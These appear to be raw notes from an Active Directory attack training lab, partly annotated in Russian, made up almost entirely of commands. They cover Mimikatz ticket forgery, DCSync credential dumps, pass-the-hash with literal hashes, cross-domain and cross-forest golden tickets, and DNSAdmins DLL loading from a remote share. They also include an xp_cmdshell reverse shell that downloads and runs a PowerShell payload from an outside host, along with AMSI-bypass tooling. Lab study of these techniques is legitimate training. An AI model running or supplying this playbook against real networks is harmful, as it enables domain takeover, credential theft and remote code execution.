/service:cifs/dcorp-mssql.dollarcorp.moneycorp.LOCAL|host/dcorp-mssql.dollarcorp.moneycorp.LOCAL Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_host~dcorp-mssql.dollarcorp.moneycorp.LOCAL@DOLLARC ORP.MONEYCORP.LOCAL_ALT.kirbi"' PS C:\ad\Tools\kekeo\x64> klist Current LogonId is 0:0xd54ae3 Cached Tickets: (2) #0> Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL Server: host/dcorp-mssql.dollarcorp.moneycorp.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize Start Time: 8/18/2020 13:40:31 (local) End Time: 8/18/2020 23:37:09 (local) Renew Time: 8/25/2020 13:37:09 (local) Session Key Type: AES-256-CTS-HMAC-SHA1-96 Cache Flags: 0 Kdc Called: #1> Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL Server: http/dcorp-mssql.dollarcorp.moneycorp.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize Start Time: 8/18/2020 13:39:03 (local) End Time: 8/18/2020 23:37:09 (local) Renew Time: 8/25/2020 13:37:09 (local) Session Key Type: AES-256-CTS-HMAC-SHA1-96 Cache Flags: 0 Kdc Called: PS C:\ad\Tools\kekeo\x64> Enter-PSSession -ComputerName dcorp-mssql.dollarcorp.moneycorp.LOCAL [dcorp-mssql.dollarcorp.moneycorp.LOCAL]: PS C:\Users\Administrator.dcorp\Documents> exit Get-DomainComputer –TrustedToAuth tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:1e10c316aec409434ba0b138cdff841b tgs::s4u /tgt:TGT_dcorp-adminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorp-dc.dollarcorp.moneycorp.LOCAL Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~dcorp-dc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"' Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"' - dnsadmins: Get-DomainGroupMember -Identity "DNSAdmins" PS C:\ad\Tools> . .\Invoke-Mimikatz.ps1 PS C:\ad\Tools> Invoke-Mimikatz -Command '"sekurlsa::pth /user:srvadmin /domain:dollarcorp.moneycorp.local /ntlm:a98e18228819e8eec3dfa33cb68b0728 /run:powershell.exe"' Install dns server tools (control) dnscmd dcorp-dc /config /serverlevelplugindll \\172.16.100.90\dll\mimilib.dll cmd sc \\dcosp-dc stop dns sc \\dcosp-dc start dns - Priv esc across domains - 1. Trust key Invoke-Mimikatz -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /ntlm:b38ff50264b74508085d82c69794a4d8 /run:powershell.exe"' Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dcorp-dc OR Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\mcorp$"' Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:67071309d6ec0741a2a2e1241163b87e /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi"' - он автоматом не будет запрашивать TGS с moneycorp (при cifs, пойдет по NTLM), поэтому просто заинжектить через /ptt нельзя новый kekeo не пашет, не может подставить имя леса .\asktgs.exe trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local .\kirbikator.exe lsa .\CIFS.mcorp-dc.moneycorp.local.kirbi ls \\mcorp-dc.moneycorp.local\c$ .\asktgs.exe trust_tkt.kirbi ldap/mcorp-dc.moneycorp.local .\kirbikator.exe lsa .\ldap.mcorp-dc.moneycorp.local.kirbi Invoke-Mimikatz -Command '"lsadump::dcsync /domain:moneycorp.local /user:mcorp\krbtgt"' - не пашет 2. SID History Invoke-Mimikatz -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /ntlm:b38ff50264b74508085d82c69794a4d8 /run:powershell.exe"' Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"' Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ptt"' ls \\mcorp-dc.moneycorp.local\c$ gwmi -class win32_operatingsystem -ComputerName mcorp-dc.moneycorp.local Invoke-Mimikatz -Command '"lsadump::dcsync /domain:moneycorp.local /user:mcorp\krbtgt"' 3. Unconstrained delegation on DC + printer bug Priv esc across forests Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\ecorp$"' Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /rc4:7d6a0c6386de5a544087702cd28292bd /service:krbtgt /target:eurocorp.local /ticket:C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi"' .\asktgs.exe C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi CIFS/eurocorp-dc.eurocorp.local .\kirbikator.exe lsa .\CIFS.eurocorp-dc.eurocorp.local.kirbi ls \\eurocorp-dc.eurocorp.local\SharedwithDcorp\ MSSQL - dblinks https://blog.netspi.com/how-to-hack-database-links-in-sql-server/ https://blog.netspi.com/sql-server-link-crawling-powerupsql/ https://docs.microsoft.com/ru-ru/sql/t-sql/functions/openquery-transact-sql?view=sql-server-ver15 - заюзать link PS C:\AD\Tools\PowerUpSQL-master\PowerUpSQL-master> Import-Module .\PowerUpSQL.psd1 Get-SQLInstanceDomain - get list of sql servers Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose - get accessible to logon by current user servers Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose - get privs of curent user to sql servers Get-SQLServerLink -Instance dcorp-mssql -Verbose - get DB links heidisql - sql client to manual do queries Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami'" | ft - command exec via links Get shell: PS C:\AD\Tools> . .\powercat.ps1 PS C:\AD\Tools> powercat -l -v -p 443 -t 1000 Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'powershell.exe iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.90/Invoke-PowerShellTcp.ps1'')'" Invoke-HoneypotBuster -OpSec - detect decoys automatically Invoke-Obfuscation - AMSI, script blocking bypass New-PSDrive -Name P -PSProvider FileSystem -Root \\USEREXAM\shared -Credential fortress\secureservicebkp